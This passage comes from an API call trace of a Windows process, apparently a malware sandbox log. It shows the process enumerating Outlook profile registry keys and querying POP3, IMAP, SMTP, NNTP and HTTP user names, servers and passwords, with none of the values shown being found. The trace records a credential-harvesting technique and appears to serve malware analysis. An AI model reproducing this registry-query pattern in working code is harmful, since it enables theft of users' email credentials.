hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.182] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.182] RegCloseKey (hKey=0x95c) returned 0x0 [0249.183] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.183] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.183] RegCloseKey (hKey=0x95c) returned 0x0 [0249.183] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.183] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.183] RegCloseKey (hKey=0x95c) returned 0x0 [0249.183] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.183] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.183] RegCloseKey (hKey=0x95c) returned 0x0 [0249.183] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.183] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.183] RegCloseKey (hKey=0x95c) returned 0x0 [0249.183] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.183] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.183] RegCloseKey (hKey=0x95c) returned 0x0 [0249.183] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.183] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.183] RegCloseKey (hKey=0x95c) returned 0x0 [0249.183] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.183] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.183] RegCloseKey (hKey=0x95c) returned 0x0 [0249.183] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.183] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.183] RegCloseKey (hKey=0x95c) returned 0x0 [0249.183] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.183] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.183] RegCloseKey (hKey=0x95c) returned 0x0 [0249.184] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.184] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.184] RegCloseKey (hKey=0x95c) returned 0x0 [0249.184] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.184] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.184] RegCloseKey (hKey=0x95c) returned 0x0 [0249.184] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.184] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.184] RegCloseKey (hKey=0x95c) returned 0x0 [0249.184] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.184] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.184] RegCloseKey (hKey=0x95c) returned 0x0 [0249.184] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.184] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.184] RegCloseKey (hKey=0x95c) returned 0x0 [0249.184] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.184] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.184] RegCloseKey (hKey=0x95c) returned 0x0 [0249.184] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.184] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.184] RegCloseKey (hKey=0x95c) returned 0x0 [0249.184] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.184] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.184] RegCloseKey (hKey=0x95c) returned 0x0 [0249.184] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.185] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.185] RegCloseKey (hKey=0x95c) returned 0x0 [0249.185] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.185] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.185] RegCloseKey (hKey=0x95c) returned 0x0 [0249.185] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.185] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.185] RegCloseKey (hKey=0x95c) returned 0x0 [0249.185] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.185] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.185] RegCloseKey (hKey=0x95c) returned 0x0 [0249.185] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.185] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.185] RegCloseKey (hKey=0x95c) returned 0x0 [0249.185] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.185] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.185] RegCloseKey (hKey=0x95c) returned 0x0 [0249.185] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.185] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.185] RegCloseKey (hKey=0x95c) returned 0x0 [0249.185] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.185] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.185] RegCloseKey (hKey=0x95c) returned 0x0 [0249.185] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.185] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.185] RegCloseKey (hKey=0x95c) returned 0x0 [0249.186] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.186] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.186] RegCloseKey (hKey=0x95c) returned 0x0 [0249.186] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.186] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.186] RegCloseKey (hKey=0x95c) returned 0x0 [0249.186] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.186] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.186] RegCloseKey (hKey=0x95c) returned 0x0 [0249.186] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.186] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.186] RegCloseKey (hKey=0x95c) returned 0x0 [0249.186] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.186] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.186] RegCloseKey (hKey=0x95c) returned 0x0 [0249.186] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", phkResult=0x1c4e6a0 | out: phkResult=0x1c4e6a0*=0x95c) returned 0x0 [0249.186] RegEnumKeyExA (in: hKey=0x95c, dwIndex=0x0, lpName=0x1c4e6b0, lpcchName=0x1c4eed8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4eed8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0249.186] RegCloseKey (hKey=0x95c) returned 0x0 [0249.186] LocalFree (hMem=0x5d67060) returned 0x0 [0249.186] RegEnumKeyExA (in: hKey=0x94c, dwIndex=0x5, lpName=0x1c4ef10, lpcchName=0x1c4f738, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="5b59a51e8457564ab95b73c6194dc831", lpcchName=0x1c4f738, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0249.186] lstrlenA (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0249.186] LocalAlloc (uFlags=0x40, uBytes=0xd7) returned 0x5d68100 [0249.186] wsprintfA (in: param_1=0x5d68100, param_2="%s\\%s" | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831") returned 88 [0249.186] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.187] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.187] RegCloseKey (hKey=0x95c) returned 0x0 [0249.187] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.187] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.187] RegCloseKey (hKey=0x95c) returned 0x0 [0249.187] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.187] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.187] RegCloseKey (hKey=0x95c) returned 0x0 [0249.187] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.187] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.187] RegCloseKey (hKey=0x95c) returned 0x0 [0249.187] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.187] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.187] RegCloseKey (hKey=0x95c) returned 0x0 [0249.187] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.187] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.187] RegCloseKey (hKey=0x95c) returned 0x0 [0249.187] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.187] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.187] RegCloseKey (hKey=0x95c) returned 0x0 [0249.187] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.187] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.187] RegCloseKey (hKey=0x95c) returned 0x0 [0249.187] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.188] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.188] RegCloseKey (hKey=0x95c) returned 0x0 [0249.188] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.188] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.188] RegCloseKey (hKey=0x95c) returned 0x0 [0249.188] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.188] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.188] RegCloseKey (hKey=0x95c) returned 0x0 [0249.188] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.188] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.188] RegCloseKey (hKey=0x95c) returned 0x0 